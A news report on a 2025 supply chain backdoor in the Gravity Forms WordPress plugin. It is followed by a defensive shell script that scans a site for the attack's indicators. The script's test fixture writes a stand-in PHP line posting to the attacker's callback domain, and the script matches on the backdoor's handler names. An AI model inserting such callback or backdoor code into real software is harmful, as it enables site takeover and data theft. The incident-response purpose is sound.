
The popular WordPress plugin Gravity Forms has suffered a supply chain attack: for a short period, the plugin packages offered for manual download from the official website carried a backdoor.
Gravity Forms is a premium plugin for creating contact, payment, and other online forms. According to official statistics, it is installed on approximately one million sites, some of which belong to well-known organizations such as Airbnb, Nike, ESPN, Unicef, and Google.
Patchstack researchers warn that they received reports of suspicious requests being generated by copies of the plugin downloaded from the official Gravity Forms website.
On examining the package, the researchers confirmed that the archive served from the vendor's own website indeed contained a malicious file, gravityforms/common.php. Closer inspection showed that this file sends a POST request to a suspicious domain, gravityapi[.]org/sites.
Further analysis showed that the trojanised file collects a wealth of metadata about the site, including its URL, the path to the admin panel, and details of the installed theme, plugins, and PHP and WordPress versions. All of it is transmitted to the attackers' server.
The attackers' server responds with base64-encoded PHP code, which is written to wp-includes/bookmark-canonical.php. The dropped file poses as "WordPress Content Management Tools" and exposes handlers such as handle_posts(), handle_media() and handle_widgets() that allow remote code execution without authentication.
RocketGenius, the company behind Gravity Forms, was notified of the issue; a representative told the researchers that the malware was present only in copies of the plugin installed manually or via Composer.
The researchers recommend that anyone who downloaded Gravity Forms on July 10 or 11, 2025, reinstall the plugin from a clean copy. Administrators should also check their sites for signs of infection.
RocketGenius has since published an incident analysis confirming that only versions 2.9.11.1 and 2.9.12 of Gravity Forms, available for manual download from July 10 to July 11, 2025, were compromised. It also notes that users who installed version 2.9.11 via Composer on those dates received an infected copy as well.
“The Gravity API service, which handles licensing, automatic updates, and the installation of add-ons initiated by Gravity Forms, has not been compromised. The attack did not affect the package updates managed by this service,” the developers stated.
According to the developer, the malicious code blocked update attempts, contacted an external server to fetch additional payloads, and added an administrator account to the site, giving the attackers full control of the compromised resource.
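The report above names four things a site owner can look for: the dropped wp-includes/bookmark-canonical.php, a reference to the callback domain gravityapi[.]org inside the plugin, one of the two affected version numbers in the plugin header, and the handler names of the backdoor. The following triage script, an added example rather than tooling from Patchstack or RocketGenius, checks a WordPress root for all four. The fixture builder writes minimal constructed stand-ins (the PHP snippets and the placeholder clean version 9.9.9 are invented for the demo, not real plugin code or a real release) so the script runs offline; point gf_ioc_scan at a real site root to use it.

```sh
#!/bin/sh
# Added triage script, not Patchstack's or RocketGenius's code. Checks a
# WordPress root for the indicators named in the report.

GF_PLUGIN_DIR="wp-content/plugins/gravityforms"
GF_BACKDOOR="wp-includes/bookmark-canonical.php"   # dropped second stage
GF_C2_DOMAIN='gravityapi\.org'                      # callback domain, dot escaped for grep
GF_BAD_VERSIONS="2.9.11.1 2.9.12"                   # manual-download releases shipped with the loader

# gf_ioc_scan WP_ROOT: prints one line per indicator found; exit status is the count (0 = clean).
gf_ioc_scan() {
    root=$1
    hits=0

    # 1. WordPress core ships wp-includes/bookmark.php and bookmark-template.php,
    #    but no bookmark-canonical.php; its presence means the second stage was dropped.
    if [ -f "$root/$GF_BACKDOOR" ]; then
        echo "IOC: unexpected core file $GF_BACKDOOR"
        hits=$((hits + 1))
    fi

    # 2. The trojanised common.php posts site metadata to gravityapi[.]org/sites.
    if [ -d "$root/$GF_PLUGIN_DIR" ] && grep -rq "$GF_C2_DOMAIN" "$root/$GF_PLUGIN_DIR"; then
        echo "IOC: callback domain referenced under $GF_PLUGIN_DIR"
        hits=$((hits + 1))
    fi

    # 3. Version header of the installed plugin against the two affected releases.
    hdr="$root/$GF_PLUGIN_DIR/gravityforms.php"
    if [ -f "$hdr" ]; then
        ver=$(sed -n 's/^[[:space:]]*\**[[:space:]]*Version:[[:space:]]*//p' "$hdr" | head -n 1 | tr -d '\r')
        for bad in $GF_BAD_VERSIONS; do
            if [ "$ver" = "$bad" ]; then
                echo "IOC: Gravity Forms $ver was distributed with the backdoor on July 10-11, 2025"
                hits=$((hits + 1))
            fi
        done
    fi

    # 4. Handler names of the dropped backdoor anywhere under wp-includes,
    #    in case the second stage was written under another file name.
    if [ -d "$root/wp-includes" ] && grep -rq -e handle_posts -e handle_media -e handle_widgets "$root/wp-includes"; then
        echo "IOC: backdoor handler names found under wp-includes"
        hits=$((hits + 1))
    fi

    return $hits
}

# gf_make_fixture DIR infected|clean: constructed stand-in site tree (sample input, not real plugin code).
gf_make_fixture() {
    dir=$1
    kind=$2
    mkdir -p "$dir/wp-includes" "$dir/$GF_PLUGIN_DIR"
    if [ "$kind" = infected ]; then
        ver=2.9.12
        printf '<?php\n// constructed stand-in for the trojanised loader\nwp_remote_post("https://gravityapi.org/sites", array());\n' \
            > "$dir/$GF_PLUGIN_DIR/common.php"
        printf '<?php\n// constructed stand-in for the dropped second stage\nfunction handle_posts() {}\n' \
            > "$dir/$GF_BACKDOOR"
    else
        ver=9.9.9   # placeholder for a clean release (assumption, not a real version)
        printf '<?php\n// benign stand-in\n' > "$dir/$GF_PLUGIN_DIR/common.php"
    fi
    printf '<?php\n/*\nPlugin Name: Gravity Forms\nVersion: %s\n*/\n' "$ver" > "$dir/$GF_PLUGIN_DIR/gravityforms.php"
}

# Demo: scan a constructed infected tree in a temporary directory.
gf_demo() {
    tmp=$(mktemp -d)
    gf_make_fixture "$tmp" infected
    n=0
    gf_ioc_scan "$tmp" || n=$?
    echo "$n indicator(s) found in constructed fixture $tmp"
    rm -rf "$tmp"
}
gf_demo
```

The script covers the file-system indicators only. The administrator account the vendor reports is a database artifact; list administrators with WP-CLI (wp user list --role=administrator) and review any account you do not recognise, and treat any hit from the script as grounds to reinstall the plugin from a clean copy and rotate credentials rather than just deleting the flagged files.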
